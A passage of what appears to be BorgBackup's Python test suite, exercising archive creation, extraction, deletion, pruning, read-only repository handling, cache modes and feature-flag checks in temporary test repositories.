xattr.setxattr(b'input/file', b'user.attribute', b'value')
self.cmd('init', self.repository_location, '-e' 'none')
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
input_abspath = os.path.abspath('input/file')
with patch.object(xattr, 'setxattr', patched_setxattr_E2BIG):
out = self.cmd('extract', self.repository_location + '::test', exit_code=EXIT_WARNING)
assert ': when setting extended attribute user.attribute: too big for this filesystem\n' in out
os.remove(input_abspath)
with patch.object(xattr, 'setxattr', patched_setxattr_ENOTSUP):
out = self.cmd('extract', self.repository_location + '::test', exit_code=EXIT_WARNING)
assert ': when setting extended attribute user.attribute: xattrs not supported on this filesystem\n' in out
os.remove(input_abspath)
with patch.object(xattr, 'setxattr', patched_setxattr_EACCES):
out = self.cmd('extract', self.repository_location + '::test', exit_code=EXIT_WARNING)
assert ': when setting extended attribute user.attribute: Permission denied\n' in out
assert os.path.isfile(input_abspath)
def test_path_normalization(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('dir1/dir2/file', size=1024 * 80)
with changedir('input/dir1/dir2'):
self.cmd('create', self.repository_location + '::test', '../../../input/dir1/../dir1/dir2/..')
output = self.cmd('list', self.repository_location + '::test')
self.assert_not_in('..', output)
self.assert_in(' input/dir1/dir2/file', output)
def test_exclude_normalization(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
with changedir('input'):
self.cmd('create', '--exclude=file1', self.repository_location + '::test1', '.')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test1')
self.assert_equal(sorted(os.listdir('output')), ['file2'])
with changedir('input'):
self.cmd('create', '--exclude=./file1', self.repository_location + '::test2', '.')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test2')
self.assert_equal(sorted(os.listdir('output')), ['file2'])
self.cmd('create', '--exclude=input/./file1', self.repository_location + '::test3', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test3')
self.assert_equal(sorted(os.listdir('output/input')), ['file2'])
def test_repeated_files(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input', 'input')
def test_overwrite(self):
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('dir2/file2', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
# Overwriting regular files and directories should be supported
os.mkdir('output/input')
os.mkdir('output/input/file1')
os.mkdir('output/input/dir2')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
self.assert_dirs_equal('input', 'output/input')
# But non-empty dirs should fail
os.unlink('output/input/file1')
os.mkdir('output/input/file1')
os.mkdir('output/input/file1/dir')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test', exit_code=1)
def test_rename(self):
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('dir2/file2', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('create', self.repository_location + '::test.2', 'input')
self.cmd('extract', '--dry-run', self.repository_location + '::test')
self.cmd('extract', '--dry-run', self.repository_location + '::test.2')
self.cmd('rename', self.repository_location + '::test', 'test.3')
self.cmd('extract', '--dry-run', self.repository_location + '::test.2')
self.cmd('rename', self.repository_location + '::test.2', 'test.4')
self.cmd('extract', '--dry-run', self.repository_location + '::test.3')
self.cmd('extract', '--dry-run', self.repository_location + '::test.4')
# Make sure both archives have been renamed
with Repository(self.repository_path) as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
self.assert_equal(len(manifest.archives), 2)
self.assert_in('test.3', manifest.archives)
self.assert_in('test.4', manifest.archives)
def test_info(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
info_repo = self.cmd('info', self.repository_location)
assert 'All archives:' in info_repo
info_archive = self.cmd('info', self.repository_location + '::test')
assert 'Archive name: test\n' in info_archive
info_archive = self.cmd('info', '--first', '1', self.repository_location)
assert 'Archive name: test\n' in info_archive
def test_info_json(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
info_repo = json.loads(self.cmd('info', '--json', self.repository_location))
repository = info_repo['repository']
assert len(repository['id']) == 64
assert 'last_modified' in repository
assert datetime.strptime(repository['last_modified'], ISO_FORMAT) # must not raise
assert info_repo['encryption']['mode'] == 'repokey'
assert 'keyfile' not in info_repo['encryption']
cache = info_repo['cache']
stats = cache['stats']
assert all(isinstance(o, int) for o in stats.values())
assert all(key in stats for key in ('total_chunks', 'total_csize', 'total_size', 'total_unique_chunks', 'unique_csize', 'unique_size'))
info_archive = json.loads(self.cmd('info', '--json', self.repository_location + '::test'))
assert info_repo['repository'] == info_archive['repository']
assert info_repo['cache'] == info_archive['cache']
archives = info_archive['archives']
assert len(archives) == 1
archive = archives[0]
assert archive['name'] == 'test'
assert isinstance(archive['command_line'], list)
assert isinstance(archive['duration'], float)
assert len(archive['id']) == 64
assert 'stats' in archive
assert datetime.strptime(archive['start'], ISO_FORMAT)
assert datetime.strptime(archive['end'], ISO_FORMAT)
def test_comment(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test1', 'input')
self.cmd('create', '--comment', 'this is the comment', self.repository_location + '::test2', 'input')
self.cmd('create', '--comment', '"deleted" comment', self.repository_location + '::test3', 'input')
self.cmd('create', '--comment', 'preserved comment', self.repository_location + '::test4', 'input')
assert 'Comment: \n' in self.cmd('info', self.repository_location + '::test1')
assert 'Comment: this is the comment' in self.cmd('info', self.repository_location + '::test2')
self.cmd('recreate', self.repository_location + '::test1', '--comment', 'added comment')
self.cmd('recreate', self.repository_location + '::test2', '--comment', 'modified comment')
self.cmd('recreate', self.repository_location + '::test3', '--comment', '')
self.cmd('recreate', self.repository_location + '::test4', '12345')
assert 'Comment: added comment' in self.cmd('info', self.repository_location + '::test1')
assert 'Comment: modified comment' in self.cmd('info', self.repository_location + '::test2')
assert 'Comment: \n' in self.cmd('info', self.repository_location + '::test3')
assert 'Comment: preserved comment' in self.cmd('info', self.repository_location + '::test4')
def test_delete(self):
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('dir2/file2', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('create', self.repository_location + '::test.2', 'input')
self.cmd('create', self.repository_location + '::test.3', 'input')
self.cmd('create', self.repository_location + '::another_test.1', 'input')
self.cmd('create', self.repository_location + '::another_test.2', 'input')
self.cmd('extract', '--dry-run', self.repository_location + '::test')
self.cmd('extract', '--dry-run', self.repository_location + '::test.2')
self.cmd('delete', '--prefix', 'another_', self.repository_location)
self.cmd('delete', '--last', '1', self.repository_location)
self.cmd('delete', self.repository_location + '::test')
self.cmd('extract', '--dry-run', self.repository_location + '::test.2')
output = self.cmd('delete', '--stats', self.repository_location + '::test.2')
self.assert_in('Deleted data:', output)
# Make sure all data except the manifest has been deleted
with Repository(self.repository_path) as repository:
self.assert_equal(len(repository), 1)
def test_delete_multiple(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test1', 'input')
self.cmd('create', self.repository_location + '::test2', 'input')
self.cmd('create', self.repository_location + '::test3', 'input')
self.cmd('delete', self.repository_location + '::test1', 'test2')
self.cmd('extract', '--dry-run', self.repository_location + '::test3')
self.cmd('delete', self.repository_location, 'test3')
assert not self.cmd('list', self.repository_location)
def test_delete_repo(self):
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('dir2/file2', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('create', self.repository_location + '::test.2', 'input')
os.environ['BORG_DELETE_I_KNOW_WHAT_I_AM_DOING'] = 'no'
self.cmd('delete', self.repository_location, exit_code=2)
assert os.path.exists(self.repository_path)
os.environ['BORG_DELETE_I_KNOW_WHAT_I_AM_DOING'] = 'YES'
self.cmd('delete', self.repository_location)
# Make sure the repo is gone
self.assertFalse(os.path.exists(self.repository_path))
def test_delete_force(self):
self.cmd('init', '--encryption=none', self.repository_location)
self.create_src_archive('test')
with Repository(self.repository_path, exclusive=True) as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
archive = Archive(repository, key, manifest, 'test')
for item in archive.iter_items():
if item.path.endswith('testsuite/archiver.py'):
repository.delete(item.chunks[-1].id)
break
else:
assert False # missed the file
repository.commit(compact=False)
output = self.cmd('delete', '--force', self.repository_location + '::test')
self.assert_in('deleted archive was corrupted', output)
self.cmd('check', '--repair', self.repository_location)
output = self.cmd('list', self.repository_location)
self.assert_not_in('test', output)
def test_delete_double_force(self):
self.cmd('init', '--encryption=none', self.repository_location)
self.create_src_archive('test')
with Repository(self.repository_path, exclusive=True) as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
archive = Archive(repository, key, manifest, 'test')
id = archive.metadata.items[0]
repository.put(id, b'corrupted items metadata stream chunk')
repository.commit(compact=False)
self.cmd('delete', '--force', '--force', self.repository_location + '::test')
self.cmd('check', '--repair', self.repository_location)
output = self.cmd('list', self.repository_location)
self.assert_not_in('test', output)
def test_corrupted_repository(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('test')
self.cmd('extract', '--dry-run', self.repository_location + '::test')
output = self.cmd('check', '--show-version', self.repository_location)
self.assert_in('borgbackup version', output) # implied output even without --info given
self.assert_not_in('Starting repository check', output) # --info not given for root logger
name = sorted(os.listdir(os.path.join(self.tmpdir, 'repository', 'data', '0')), reverse=True)[1]
with open(os.path.join(self.tmpdir, 'repository', 'data', '0', name), 'r+b') as fd:
fd.seek(100)
fd.write(b'XXXX')
output = self.cmd('check', '--info', self.repository_location, exit_code=1)
self.assert_in('Starting repository check', output) # --info given for root logger
def test_readonly_check(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('test')
with self.read_only(self.repository_path):
# verify that command normally doesn't work with read-only repo
if self.FORK_DEFAULT:
self.cmd('check', '--verify-data', self.repository_location, exit_code=EXIT_ERROR)
else:
with pytest.raises((LockFailed, RemoteRepository.RPCError)) as excinfo:
self.cmd('check', '--verify-data', self.repository_location)
if isinstance(excinfo.value, RemoteRepository.RPCError):
assert excinfo.value.exception_class == 'LockFailed'
# verify that command works with read-only repo when using --bypass-lock
self.cmd('check', '--verify-data', self.repository_location, '--bypass-lock')
def test_readonly_diff(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('a')
self.create_src_archive('b')
with self.read_only(self.repository_path):
# verify that command normally doesn't work with read-only repo
if self.FORK_DEFAULT:
self.cmd('diff', '%s::a' % self.repository_location, 'b', exit_code=EXIT_ERROR)
else:
with pytest.raises((LockFailed, RemoteRepository.RPCError)) as excinfo:
self.cmd('diff', '%s::a' % self.repository_location, 'b')
if isinstance(excinfo.value, RemoteRepository.RPCError):
assert excinfo.value.exception_class == 'LockFailed'
# verify that command works with read-only repo when using --bypass-lock
self.cmd('diff', '%s::a' % self.repository_location, 'b', '--bypass-lock')
def test_readonly_export_tar(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('test')
with self.read_only(self.repository_path):
# verify that command normally doesn't work with read-only repo
if self.FORK_DEFAULT:
self.cmd('export-tar', '%s::test' % self.repository_location, 'test.tar', exit_code=EXIT_ERROR)
else:
with pytest.raises((LockFailed, RemoteRepository.RPCError)) as excinfo:
self.cmd('export-tar', '%s::test' % self.repository_location, 'test.tar')
if isinstance(excinfo.value, RemoteRepository.RPCError):
assert excinfo.value.exception_class == 'LockFailed'
# verify that command works with read-only repo when using --bypass-lock
self.cmd('export-tar', '%s::test' % self.repository_location, 'test.tar', '--bypass-lock')
def test_readonly_extract(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('test')
with self.read_only(self.repository_path):
# verify that command normally doesn't work with read-only repo
if self.FORK_DEFAULT:
self.cmd('extract', '%s::test' % self.repository_location, exit_code=EXIT_ERROR)
else:
with pytest.raises((LockFailed, RemoteRepository.RPCError)) as excinfo:
self.cmd('extract', '%s::test' % self.repository_location)
if isinstance(excinfo.value, RemoteRepository.RPCError):
assert excinfo.value.exception_class == 'LockFailed'
# verify that command works with read-only repo when using --bypass-lock
self.cmd('extract', '%s::test' % self.repository_location, '--bypass-lock')
def test_readonly_info(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('test')
with self.read_only(self.repository_path):
# verify that command normally doesn't work with read-only repo
if self.FORK_DEFAULT:
self.cmd('info', self.repository_location, exit_code=EXIT_ERROR)
else:
with pytest.raises((LockFailed, RemoteRepository.RPCError)) as excinfo:
self.cmd('info', self.repository_location)
if isinstance(excinfo.value, RemoteRepository.RPCError):
assert excinfo.value.exception_class == 'LockFailed'
# verify that command works with read-only repo when using --bypass-lock
self.cmd('info', self.repository_location, '--bypass-lock')
def test_readonly_list(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('test')
with self.read_only(self.repository_path):
# verify that command normally doesn't work with read-only repo
if self.FORK_DEFAULT:
self.cmd('list', self.repository_location, exit_code=EXIT_ERROR)
else:
with pytest.raises((LockFailed, RemoteRepository.RPCError)) as excinfo:
self.cmd('list', self.repository_location)
if isinstance(excinfo.value, RemoteRepository.RPCError):
assert excinfo.value.exception_class == 'LockFailed'
# verify that command works with read-only repo when using --bypass-lock
self.cmd('list', self.repository_location, '--bypass-lock')
@unittest.skipUnless(llfuse, 'llfuse not installed')
def test_readonly_mount(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('test')
with self.read_only(self.repository_path):
# verify that command normally doesn't work with read-only repo
if self.FORK_DEFAULT:
with self.fuse_mount(self.repository_location, exit_code=EXIT_ERROR):
pass
else:
with pytest.raises((LockFailed, RemoteRepository.RPCError)) as excinfo:
# self.fuse_mount always assumes fork=True, so for this test we have to manually set fork=False
with self.fuse_mount(self.repository_location, fork=False):
pass
if isinstance(excinfo.value, RemoteRepository.RPCError):
assert excinfo.value.exception_class == 'LockFailed'
# verify that command works with read-only repo when using --bypass-lock
with self.fuse_mount(self.repository_location, None, '--bypass-lock'):
pass
@pytest.mark.skipif('BORG_TESTS_IGNORE_MODES' in os.environ, reason='modes unreliable')
def test_umask(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
mode = os.stat(self.repository_path).st_mode
self.assertEqual(stat.S_IMODE(mode), 0o700)
def test_create_dry_run(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', '--dry-run', self.repository_location + '::test', 'input')
# Make sure no archive has been created
with Repository(self.repository_path) as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
self.assert_equal(len(manifest.archives), 0)
def add_unknown_feature(self, operation):
with Repository(self.repository_path, exclusive=True) as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
manifest.config[b'feature_flags'] = {operation.value.encode(): {b'mandatory': [b'unknown-feature']}}
manifest.write()
repository.commit(compact=False)
def cmd_raises_unknown_feature(self, args):
if self.FORK_DEFAULT:
self.cmd(*args, exit_code=EXIT_ERROR)
else:
with pytest.raises(MandatoryFeatureUnsupported) as excinfo:
self.cmd(*args)
assert excinfo.value.args == (['unknown-feature'],)
def test_unknown_feature_on_create(self):
print(self.cmd('init', '--encryption=repokey', self.repository_location))
self.add_unknown_feature(Manifest.Operation.WRITE)
self.cmd_raises_unknown_feature(['create', self.repository_location + '::test', 'input'])
def test_unknown_feature_on_cache_sync(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('delete', '--cache-only', self.repository_location)
self.add_unknown_feature(Manifest.Operation.READ)
self.cmd_raises_unknown_feature(['create', self.repository_location + '::test', 'input'])
def test_unknown_feature_on_change_passphrase(self):
print(self.cmd('init', '--encryption=repokey', self.repository_location))
self.add_unknown_feature(Manifest.Operation.CHECK)
self.cmd_raises_unknown_feature(['key', 'change-passphrase', self.repository_location])
def test_unknown_feature_on_read(self):
print(self.cmd('init', '--encryption=repokey', self.repository_location))
self.cmd('create', self.repository_location + '::test', 'input')
self.add_unknown_feature(Manifest.Operation.READ)
with changedir('output'):
self.cmd_raises_unknown_feature(['extract', self.repository_location + '::test'])
self.cmd_raises_unknown_feature(['list', self.repository_location])
self.cmd_raises_unknown_feature(['info', self.repository_location + '::test'])
def test_unknown_feature_on_rename(self):
print(self.cmd('init', '--encryption=repokey', self.repository_location))
self.cmd('create', self.repository_location + '::test', 'input')
self.add_unknown_feature(Manifest.Operation.CHECK)
self.cmd_raises_unknown_feature(['rename', self.repository_location + '::test', 'other'])
def test_unknown_feature_on_delete(self):
print(self.cmd('init', '--encryption=repokey', self.repository_location))
self.cmd('create', self.repository_location + '::test', 'input')
self.add_unknown_feature(Manifest.Operation.DELETE)
# delete of an archive raises
self.cmd_raises_unknown_feature(['delete', self.repository_location + '::test'])
self.cmd_raises_unknown_feature(['prune', '--keep-daily=3', self.repository_location])
# delete of the whole repository ignores features
self.cmd('delete', self.repository_location)
@unittest.skipUnless(llfuse, 'llfuse not installed')
def test_unknown_feature_on_mount(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
self.add_unknown_feature(Manifest.Operation.READ)
mountpoint = os.path.join(self.tmpdir, 'mountpoint')
os.mkdir(mountpoint)
# XXX this might hang if it doesn't raise an error
self.cmd_raises_unknown_feature(['mount', self.repository_location + '::test', mountpoint])
@pytest.mark.allow_cache_wipe
def test_unknown_mandatory_feature_in_cache(self):
if self.prefix:
path_prefix = 'ssh://__testsuite__'
else:
path_prefix = ''
print(self.cmd('init', '--encryption=repokey', self.repository_location))
with Repository(self.repository_path, exclusive=True) as repository:
if path_prefix:
repository._location = Location(self.repository_location)
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
with Cache(repository, key, manifest) as cache:
cache.begin_txn()
cache.cache_config.mandatory_features = set(['unknown-feature'])
cache.commit()
if self.FORK_DEFAULT:
self.cmd('create', self.repository_location + '::test', 'input')
else:
called = False
wipe_cache_safe = LocalCache.wipe_cache
def wipe_wrapper(*args):
nonlocal called
called = True
wipe_cache_safe(*args)
with patch.object(LocalCache, 'wipe_cache', wipe_wrapper):
self.cmd('create', self.repository_location + '::test', 'input')
assert called
with Repository(self.repository_path, exclusive=True) as repository:
if path_prefix:
repository._location = Location(self.repository_location)
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
with Cache(repository, key, manifest) as cache:
assert cache.cache_config.mandatory_features == set([])
def test_progress_on(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--progress', self.repository_location + '::test4', 'input')
self.assert_in("\r", output)
def test_progress_off(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', self.repository_location + '::test5', 'input')
self.assert_not_in("\r", output)
def test_file_status(self):
"""test that various file status show expected results
clearly incomplete: only tests for the weird "unchanged" status for now"""
self.create_regular_file('file1', size=1024 * 80)
time.sleep(1) # file2 must have newer timestamps than file1
self.create_regular_file('file2', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--list', self.repository_location + '::test', 'input')
self.assert_in("A input/file1", output)
self.assert_in("A input/file2", output)
# should find first file as unmodified
output = self.cmd('create', '--list', self.repository_location + '::test1', 'input')
self.assert_in("U input/file1", output)
# this is expected, although surprising, for why, see:
# https://borgbackup.readthedocs.org/en/latest/faq.html#i-am-seeing-a-added-status-for-a-unchanged-file
self.assert_in("A input/file2", output)
def test_file_status_cs_cache_mode(self):
"""test that a changed file with faked "previous" mtime still gets backed up in ctime,size cache_mode"""
self.create_regular_file('file1', contents=b'123')
time.sleep(1) # file2 must have newer timestamps than file1
self.create_regular_file('file2', size=10)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--list', '--files-cache=ctime,size', self.repository_location + '::test1', 'input')
# modify file1, but cheat with the mtime (and atime) and also keep same size:
st = os.stat('input/file1')
self.create_regular_file('file1', contents=b'321')
os.utime('input/file1', ns=(st.st_atime_ns, st.st_mtime_ns))
# this mode uses ctime for change detection, so it should find file1 as modified
output = self.cmd('create', '--list', '--files-cache=ctime,size', self.repository_location + '::test2', 'input')
self.assert_in("M input/file1", output)
def test_file_status_ms_cache_mode(self):
"""test that a chmod'ed file with no content changes does not get chunked again in mtime,size cache_mode"""
self.create_regular_file('file1', size=10)
time.sleep(1) # file2 must have newer timestamps than file1
self.create_regular_file('file2', size=10)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--list', '--files-cache=mtime,size', self.repository_location + '::test1', 'input')
# change mode of file1, no content change:
st = os.stat('input/file1')
os.chmod('input/file1', st.st_mode ^ stat.S_IRWXO) # this triggers a ctime change, but mtime is unchanged
# this mode uses mtime for change detection, so it should find file1 as unmodified
output = self.cmd('create', '--list', '--files-cache=mtime,size', self.repository_location + '::test2', 'input')
self.assert_in("U input/file1", output)
def test_file_status_rc_cache_mode(self):
"""test that files get rechunked unconditionally in rechunk,ctime cache mode"""
self.create_regular_file('file1', size=10)
time.sleep(1) # file2 must have newer timestamps than file1
self.create_regular_file('file2', size=10)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--list', '--files-cache=rechunk,ctime', self.repository_location + '::test1', 'input')
# no changes here, but this mode rechunks unconditionally
output = self.cmd('create', '--list', '--files-cache=rechunk,ctime', self.repository_location + '::test2', 'input')
self.assert_in("A input/file1", output)
def test_file_status_excluded(self):
"""test that excluded paths are listed"""
self.create_regular_file('file1', size=1024 * 80)
time.sleep(1) # file2 must have newer timestamps than file1
self.create_regular_file('file2', size=1024 * 80)
if has_lchflags:
self.create_regular_file('file3', size=1024 * 80)
platform.set_flags(os.path.join(self.input_path, 'file3'), stat.UF_NODUMP)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--list', '--exclude-nodump', self.repository_location + '::test', 'input')
self.assert_in("A input/file1", output)
self.assert_in("A input/file2", output)
if has_lchflags:
self.assert_in("x input/file3", output)
# should find second file as excluded
output = self.cmd('create', '--list', '--exclude-nodump', self.repository_location + '::test1', 'input', '--exclude', '*/file2')
self.assert_in("U input/file1", output)
self.assert_in("x input/file2", output)
if has_lchflags:
self.assert_in("x input/file3", output)
def test_create_json(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
create_info = json.loads(self.cmd('create', '--json', self.repository_location + '::test', 'input'))
# The usual keys
assert 'encryption' in create_info
assert 'repository' in create_info
assert 'cache' in create_info
assert 'last_modified' in create_info['repository']
archive = create_info['archive']
assert archive['name'] == 'test'
assert isinstance(archive['command_line'], list)
assert isinstance(archive['duration'], float)
assert len(archive['id']) == 64
assert 'stats' in archive
def test_create_topical(self):
self.create_regular_file('file1', size=1024 * 80)
time.sleep(1) # file2 must have newer timestamps than file1
self.create_regular_file('file2', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
# no listing by default
output = self.cmd('create', self.repository_location + '::test', 'input')
self.assert_not_in('file1', output)
# shouldn't be listed even if unchanged
output = self.cmd('create', self.repository_location + '::test0', 'input')
self.assert_not_in('file1', output)
# should list the file as unchanged
output = self.cmd('create', '--list', '--filter=U', self.repository_location + '::test1', 'input')
self.assert_in('file1', output)
# should *not* list the file as changed
output = self.cmd('create', '--list', '--filter=AM', self.repository_location + '::test2', 'input')
self.assert_not_in('file1', output)
# change the file
self.create_regular_file('file1', size=1024 * 100)
# should list the file as changed
output = self.cmd('create', '--list', '--filter=AM', self.repository_location + '::test3', 'input')
self.assert_in('file1', output)
@pytest.mark.skipif(not are_fifos_supported(), reason='FIFOs not supported')
def test_create_read_special_symlink(self):
from threading import Thread
def fifo_feeder(fifo_fn, data):
fd = os.open(fifo_fn, os.O_WRONLY)
try:
os.write(fd, data)
finally:
os.close(fd)
self.cmd('init', '--encryption=repokey', self.repository_location)
archive = self.repository_location + '::test'
data = b'foobar' * 1000
fifo_fn = os.path.join(self.input_path, 'fifo')
link_fn = os.path.join(self.input_path, 'link_fifo')
os.mkfifo(fifo_fn)
os.symlink(fifo_fn, link_fn)
t = Thread(target=fifo_feeder, args=(fifo_fn, data))
t.start()
try:
self.cmd('create', '--read-special', archive, 'input/link_fifo')
finally:
t.join()
with changedir('output'):
self.cmd('extract', archive)
fifo_fn = 'input/link_fifo'
with open(fifo_fn, 'rb') as f:
extracted_data = f.read()
assert extracted_data == data
def test_create_read_special_broken_symlink(self):
os.symlink('somewhere does not exist', os.path.join(self.input_path, 'link'))
self.cmd('init', '--encryption=repokey', self.repository_location)
archive = self.repository_location + '::test'
self.cmd('create', '--read-special', archive, 'input')
output = self.cmd('list', archive)
assert 'input/link -> somewhere does not exist' in output
# def test_cmdline_compatibility(self):
# self.create_regular_file('file1', size=1024 * 80)
# self.cmd('init', '--encryption=repokey', self.repository_location)
# self.cmd('create', self.repository_location + '::test', 'input')
# output = self.cmd('foo', self.repository_location, '--old')
# self.assert_in('"--old" has been deprecated. Use "--new" instead', output)
def test_prune_repository(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test1', src_dir)
self.cmd('create', self.repository_location + '::test2', src_dir)
# these are not really a checkpoints, but they look like some:
self.cmd('create', self.repository_location + '::test3.checkpoint', src_dir)
self.cmd('create', self.repository_location + '::test3.checkpoint.1', src_dir)
self.cmd('create', self.repository_location + '::test4.checkpoint', src_dir)
output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=1')
assert re.search(r'Would prune:\s+test1', output)
# must keep the latest non-checkpoint archive:
assert re.search(r'Keeping archive \(rule: daily #1\):\s+test2', output)
# must keep the latest checkpoint archive:
assert re.search(r'Keeping checkpoint archive:\s+test4.checkpoint', output)
output = self.cmd('list', '--consider-checkpoints', self.repository_location)
self.assert_in('test1', output)
self.assert_in('test2', output)
self.assert_in('test3.checkpoint', output)
self.assert_in('test3.checkpoint.1', output)
self.assert_in('test4.checkpoint', output)
self.cmd('prune', self.repository_location, '--keep-daily=1')
output = self.cmd('list', '--consider-checkpoints', self.repository_location)
self.assert_not_in('test1', output)
# the latest non-checkpoint archive must be still there:
self.assert_in('test2', output)
# only the latest checkpoint archive must still be there:
self.assert_not_in('test3.checkpoint', output)
self.assert_not_in('test3.checkpoint.1', output)
self.assert_in('test4.checkpoint', output)
# now we supercede the latest checkpoint by a successful backup:
self.cmd('create', self.repository_location + '::test5', src_dir)
self.cmd('prune', self.repository_location, '--keep-daily=2')
output = self.cmd('list', '--consider-checkpoints', self.repository_location)
# all checkpoints should be gone now:
self.assert_not_in('checkpoint', output)
# the latest archive must be still there
self.assert_in('test5', output)
# Given a date and time in local tz, create a UTC timestamp string suitable
# for create --timestamp command line option
def _to_utc_timestamp(self, year, month, day, hour, minute, second):
dtime = datetime(year, month, day, hour, minute, second, 0, dateutil.tz.gettz())
return dtime.astimezone(dateutil.tz.UTC).strftime("%Y-%m-%dT%H:%M:%S")
def _create_archive_ts(self, name, y, m, d, H=0, M=0, S=0):
loc = self.repository_location + '::' + name
self.cmd('create', '--timestamp', self._to_utc_timestamp(y, m, d, H, M, S), loc, src_dir)
# This test must match docs/misc/prune-example.txt
def test_prune_repository_example(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
# Archives that will be kept, per the example
# Oldest archive
self._create_archive_ts('test01', 2015, 1, 1)
# 6 monthly archives
self._create_archive_ts('test02', 2015, 6, 30)
self._create_archive_ts('test03', 2015, 7, 31)
self._create_archive_ts('test04', 2015, 8, 31)
self._create_archive_ts('test05', 2015, 9, 30)
self._create_archive_ts('test06', 2015, 10, 31)
self._create_archive_ts('test07', 2015, 11, 30)
# 14 daily archives
self._create_archive_ts('test08', 2015, 12, 17)
self._create_archive_ts('test09', 2015, 12, 18)
self._create_archive_ts('test10', 2015, 12, 20)
self._create_archive_ts('test11', 2015, 12, 21)
self._create_archive_ts('test12', 2015, 12, 22)
self._create_archive_ts('test13', 2015, 12, 23)
self._create_archive_ts('test14', 2015, 12, 24)
self._create_archive_ts('test15', 2015, 12, 25)
self._create_archive_ts('test16', 2015, 12, 26)
self._create_archive_ts('test17', 2015, 12, 27)
self._create_archive_ts('test18', 2015, 12, 28)
self._create_archive_ts('test19', 2015, 12, 29)
self._create_archive_ts('test20', 2015, 12, 30)
self._create_archive_ts('test21', 2015, 12, 31)
# Additional archives that would be pruned
# The second backup of the year
self._create_archive_ts('test22', 2015, 1, 2)
# The next older monthly backup
self._create_archive_ts('test23', 2015, 5, 31)
# The next older daily backup
self._create_archive_ts('test24', 2015, 12, 16)
output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=14', '--keep-monthly=6', '--keep-yearly=1')
# Prune second backup of the year
assert re.search(r'Would prune:\s+test22', output)
# Prune next older monthly and daily backups
assert re.search(r'Would prune:\s+test23', output)
assert re.search(r'Would prune:\s+test24', output)
# Must keep the other 21 backups
# Yearly is kept as oldest archive
assert re.search(r'Keeping archive \(rule: yearly\[oldest\] #1\):\s+test01', output)
for i in range(1, 7):
assert re.search(r'Keeping archive \(rule: monthly #' + str(i) + r'\):\s+test' + ("%02d" % (8-i)), output)
